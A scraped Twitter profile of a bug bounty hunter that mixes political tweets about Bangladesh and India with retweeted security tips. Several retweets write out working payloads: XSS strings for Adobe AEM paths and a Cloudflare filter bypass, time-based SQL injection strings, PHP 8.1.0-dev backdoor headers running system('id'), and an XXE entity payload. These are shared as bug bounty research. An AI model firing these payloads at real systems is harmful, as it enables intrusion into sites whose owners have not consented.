Yeasir Arafat(nullsaint) @SSkylinearafat - Twitter Profile

Pinned Tweet

Yeasir Arafat(nullsaint) @SSkylinearafat

almost 5 years ago

Another achievement of the year! Became and “Hero” and 15 for 15 in recognition of 2021. @SynackRedTeam https://t.co/4R4uH3NMt2

3

38

0

1

0

Yeasir Arafat(nullsaint) @SSkylinearafat

about 1 year ago

@hahwul Hey, would this work under VPN to get the unauthenticated web apps URLs?

0

28

Yeasir Arafat(nullsaint) @SSkylinearafat

about 1 year ago

@TulsiGabbard your comments goes against on Bangladesh freedom, it’s a free and independent nation that has whole rights, what is right to do not to do. We don’t need your “Tulsi Syrup”. You better pay attention how Muslims minorities are being attacked and abused by Indian govt.

0

6

Yeasir Arafat(nullsaint) @SSkylinearafat

almost 2 years ago

Hello all Online activists and Tech enthusiasts, I would like to encourage you to post positive and share current stories on social media’s(Fb, x,LinkedIn) against Indian news media rumors. You may aware of Indian news media are spreading false news and propaganda.

3

2

0

214

Who to follow

SherlockSecure

@sherlocksecure

Security Engineer | I'm that SherlockSecure ;( All views are very obviously just mine

21 Years Old, Hacker, Re-searcher

Yeasir Arafat(nullsaint) @SSkylinearafat

about 2 years ago

@Xtytia0922 Bullseye

1

3

0

297

SSkylinearafat retweeted

Aircorridor

@_aircorridor

over 2 years ago

Digital Forensics, Part 3: Recovering Deleted Files In forensic investigation, recovering deleted files is a fundamental skill. When files are "deleted," they stay until overwritten and we can recover them. @three_cube #forensics https://t.co/JclLMd6lx3

_aircorridor's tweet photo. Digital Forensics, Part 3: Recovering Deleted Files

In forensic investigation, recovering deleted files is a fundamental skill. When files are "deleted," they stay until overwritten and we can recover them.

@three_cube #forensics

https://t.co/JclLMd6lx3 https://t.co/9HmQELcnR1

0

319

108

170

22K

Yeasir Arafat(nullsaint) @SSkylinearafat

over 2 years ago

@Savitar0x01 @jobertabma This mf never changed! Zero transparency! Scam!

0

108

Yeasir Arafat(nullsaint) @SSkylinearafat

over 2 years ago

@ihcdhaka Why you being silent on killing our innocent BGB members??? #boycottindia

0

18

SSkylinearafat retweeted

Jayesh Madnani

@Jayesh25

over 2 years ago

🔐 Bug Bounty Tips: Reported 15+ XSS Issues on a broad-scoped program leveraging AEM! 🚀 If you stumble upon a target app using AEM, make sure to use these XSS payloads for some quick wins! 💰 1️⃣ https://target[.]com/1<img src=x data'a'onerror=alert(domain)>.childrenlist.htm 2️⃣https://target[.]com/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a" 3️⃣https://target[.]com/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html Always try to escalate these issues to an Account Takeover for the chance at a 'High' severity payout. Stay vigilant! 🕵️‍♂️💡 #EthicalHacking #BugBounty #SecurityTips #Cybersecurity #StaySecure #HackerOne #BugCrowd #BugBountyTips

Jayesh25's tweet photo. 🔐 Bug Bounty Tips: Reported 15+ XSS Issues on a broad-scoped program leveraging AEM! 🚀

If you stumble upon a target app using AEM, make sure to use these XSS payloads for some quick wins! 💰

1️⃣ https://target[.]com/1<img src=x data'a'onerror=alert(domain)>.childrenlist.htm

2️⃣https://target[.]com/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"

3️⃣https://target[.]com/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html

Always try to escalate these issues to an Account Takeover for the chance at a 'High' severity payout. Stay vigilant! 🕵️‍♂️💡
#EthicalHacking #BugBounty #SecurityTips #Cybersecurity #StaySecure #HackerOne #BugCrowd #BugBountyTips

12

628

156

495

43K

SSkylinearafat retweeted

Will Gates @WllGates

over 2 years ago

7 SQLs 4 in php (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ 1 in aspx orwa';%20waitfor%20delay%20'0:0:6'%20--%20 2 in graphql orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))-- credit: @GodfatherOrwa #bug

WllGates's tweet photo. 7 SQLs

4 in php

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1 in aspx

orwa';%20waitfor%20delay%20'0:0:6'%20--%20

2 in graphql

orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))--

credit: @GodfatherOrwa

#bug https://t.co/jYEOhUikWk

6

469

139

282

26K

Yeasir Arafat(nullsaint) @SSkylinearafat

over 2 years ago

@PortSwigger @PortSwiggerRes @albinowax Fire this payload automatically by burp with any input form. Why? Which Reasons?

0

481

Yeasir Arafat(nullsaint) @SSkylinearafat

over 2 years ago

Hello @PortSwigger @PortSwiggerRes @albinowax I'm kindly requesting you to give me an answer to this? Why does Burp Suite fire this "p@y<"'p@y" payloads? This creates trouble for me, Please help me out by answering the question.

3

12

0

5K

SSkylinearafat retweeted

Tur.js

@Tur24Tur

over 2 years ago

I've just developed my first @Burp_Suite Bambdas specifically to identify OWASP Top-25 Parameters potentially vulnerable to XSS, SSRF, RCE, SQLi, LFI, and Open Redirect. For easy code access, visit GitHub: https://t.co/fCScaTPJ1I #Bambdas #Java

Tur24Tur's tweet photo. I've just developed my first @Burp_Suite Bambdas specifically to identify OWASP Top-25 Parameters potentially vulnerable to XSS, SSRF, RCE, SQLi, LFI, and Open Redirect. For easy code access, visit GitHub:
https://t.co/fCScaTPJ1I

#Bambdas #Java https://t.co/uGm8i3wDE1

8

665

170

440

91K

SSkylinearafat retweeted

𝐑𝐀𝐢𝐡𝐚𝐧 ✪ @zapstiko

over 2 years ago

If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #bugbountytips #rce #sqli

zapstiko's tweet photo. If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');

#bugbounty #bugbountytips #rce #sqli https://t.co/5RFsGqQNBx

8

848

264

406

53K

SSkylinearafat retweeted

Godfather Orwa 🇯🇴 @GodfatherOrwa

almost 3 years ago

7 SQLs 4 in php (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ 1 in aspx orwa';%20waitfor%20delay%20'0:0:6'%20--%20 2 in graphql orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))-- #bugbountytips #bugbountytip 💕

GodfatherOrwa's tweet photo. 7 SQLs

4 in php

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1 in aspx

orwa';%20waitfor%20delay%20'0:0:6'%20--%20

2 in graphql
orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))--
#bugbountytips #bugbountytip 💕 https://t.co/jARRCam5Zw

35

2K

656

1K

148K

Yeasir Arafat(nullsaint) @SSkylinearafat

almost 3 years ago

@IndianCERT Are you aware of your country's hacktivist team "Indian Cyber Force" threatening us with cyber-attacks on August 15th is our National Mourning Day of Bangladesh???

0

78

SSkylinearafat retweeted

Nicolas Grégoire @Agarri_FR

over 10 years ago

XXE inside a SOAP node: <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://0x0:22/"> %dtd;]><xxx/>]]></foo></soap:Body>

4

520

187

114

0

SSkylinearafat retweeted

Mehmet Kelepçe @m_kelepce

almost 3 years ago

Cloudflare XSS protection bypass: "><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))>

4

362

101

178

24K

SSkylinearafat retweeted

Pratik Dabhi

@impratikdabhi

almost 3 years ago

Mobile Pentesting 101 - How to Set Up Your iOS Environment https://t.co/mwQsMAQ13a

1

251

83

133

20K

SSkylinearafat retweeted

Mobile Hacker @androidmalware2

almost 3 years ago

Well written introduction blog on how to write your first Frida script for Android https://t.co/qIXbbOZHyG via @R4JVE3R #frida #bugbounty #pentest @fridadotre